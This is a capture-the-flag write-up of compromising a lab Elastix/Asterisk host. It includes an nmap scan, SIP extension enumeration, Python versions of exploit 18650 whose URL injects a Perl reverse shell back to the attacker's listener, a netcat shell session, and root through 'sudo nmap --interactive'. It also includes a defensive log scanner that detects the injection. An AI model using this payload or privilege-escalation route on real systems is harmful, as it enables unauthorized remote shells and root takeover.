```
# Nmap 7.80 scan initiated Wed Sep 25 13:54:58 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 993,80,110,10000,143,3306,4190,4559,995,111,5038,443,22,4445,880,25,U:10000 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.23s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) STLS AUTH-RESP-CODE TOP USER RESP-CODES UIDL APOP PIPELINING LOGIN-DELAY(0) EXPIRE(NEVER)
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: BINARY UNSELECT Completed ATOMIC LITERAL+ X-NETSCAPE LIST-SUBSCRIBED SORT=MODSEQ IDLE UIDPLUS ACL MULTIAPPEND IMAP4rev1 RIGHTS=kxte STARTTLS CATENATE THREAD=ORDEREDSUBJECT NAMESPACE NO ANNOTATEMORE THREAD=REFERENCES LISTEXT OK CHILDREN CONDSTORE QUOTA MAILBOX-REFERRALS IMAP4 URLAUTHA0001 SORT ID RENAME
443/tcp   open  ssl/https?
|_ssl-date: 2019-09-25T08:20:35+00:00; -7m55s from scanner time.
880/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|media device|PBX|WAP|printer|specialized
Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys embedded (94%), HP embedded (94%), Enterasys embedded (94%), Netgear embedded (94%), Osmosys embedded (93%), Riverbed RiOS (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.27 cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:linksys:wrv54g cpe:/h:enterasys:ap3620 cpe:/h:netgear:eva9100 cpe:/o:riverbed:rios
Aggressive OS guesses: Linux 2.6.27 (95%), Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.27 (likely embedded) (95%), Linux 2.6.18 (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.30 (95%), Linux 2.6.5 (Fedora Core 2) (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.5-7.283-smp (SuSE Enterprise Server 9, x86) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: -7m55s

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   226.92 ms 10.10.14.1
2   227.25 ms 10.10.10.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 25 14:01:06 2019 -- 1 IP address (1 host up) scanned in 368.60 seconds
```
Running all the services through searchsploit didn't get me anything worthwhile: the exploits either failed outright or did not work because of compatibility or version issues. The obvious attack vectors left were the web servers on ports 10000 and 80. The one on 10000 didn't have anything interesting; however, the one on 80, the Elastix server, had some publicly available exploits, namely 18650.
```python
--- SNIP ---
import urllib
import ssl

rhost = "10.10.10.7"      # target Elastix host
lhost = "10.10.14.4"      # attacker listener address
lport = 5555              # attacker listener port
extension = "1000"        # SIP extension used in the callmenum parameter

# The callmenum value carries URL-encoded CRLFs that inject extra Asterisk
# manager headers (Application: system / Data: ...) after the dial string.
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
--- SNIP ---
```
Running the script as it is didn't get me the shell as expected; instead it gave me SSL errors, which I tried to resolve with the modified script below. Alongside that I had to find a valid extension number, which I did with the following svwar invocation:

```
svwar -m INVITE -e100-300 10.10.10.7
```
```python
import urllib
import ssl

rhost = "10.10.10.7"      # target Elastix host
lhost = "10.10.14.4"      # attacker listener address
lport = 5555              # attacker listener port
extension = "233"         # valid extension found with svwar

# Reverse shell payload
# SSL context that skips hostname and certificate verification
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url, context=ctx)
```
However, this didn't work either and still produced SSL errors. Since the script was only making a single request to the web server with some parameters, I pasted the request URL into the browser while keeping my listener running, and to my surprise I got the reverse shell.
```
$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.7] 58227
id
uid=100(asterisk) gid=101(asterisk)
```
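A defender's counterpart to the request above, as an added example that is not part of the original writeup or of the exploit script: it parses constructed Apache access-log lines and flags callme_page.php requests whose callmenum parameter carries CRLF-encoded Asterisk Manager headers, which is the shape of the injection used here. The sample log lines, the LOG_RE pattern and the function names are assumptions for the demonstration, and it assumes the web server logs the request line as received (still percent-encoded).

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed Apache combined-format lines (not taken from the original page).
# The first mirrors the callme_page.php request shape, with a harmless perl
# one-liner standing in for the real payload.
SAMPLE_LOG = """\
10.10.14.4 - - [25/Sep/2019:14:10:01 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-e%20%271%27%0D%0A%0D%0A HTTP/1.1" 200 512 "-" "Python-urllib/1.17"
10.10.14.9 - - [25/Sep/2019:14:11:07 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.9 - - [25/Sep/2019:14:12:45 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
# A legitimate callmenum is a dial string; these manager headers have no business in it.
SUSPICIOUS_HEADERS = ("application:", "data:")


def inspect_callmenum(raw_value):
    """Return the reasons a (still URL-encoded) callmenum value looks injected."""
    decoded = unquote(raw_value)
    reasons = []
    if "\r" in decoded or "\n" in decoded:
        reasons.append("CRLF in callmenum")
    lowered = decoded.lower()
    for header in SUSPICIOUS_HEADERS:
        if header in lowered:
            reasons.append(f"manager header '{header}' injected")
    return reasons


def scan_access_log(text):
    """Return one dict per suspicious callme_page.php request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/recordings/misc/callme_page.php"):
            continue
        # Split the raw query ourselves so each value is decoded exactly once.
        for pair in parts.query.split("&"):
            key, _, value = pair.partition("=")
            reasons = inspect_callmenum(value) if key == "callmenum" else []
            if reasons:
                hits.append({"ip": m["ip"], "ts": m["ts"], "reasons": reasons})
    return hits
```

Run over the sample log this reports only the first line, from 10.10.14.4, with all three reasons; the plain `callmenum=233` request and the unrelated page are left alone.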
Beneath the exploit script itself a privilege escalation method was mentioned, which I gave a shot, and to my astonishment it worked just fine and got me a root shell.
```
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
bash
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cat /root/root.txt
d88e0***
cat /home/fanis/user.txt
aeff3***
```
I learnt about SIP extensions and how to find a valid one for the target machine, and how reading exploit scripts in detail can actually help in owning the complete machine.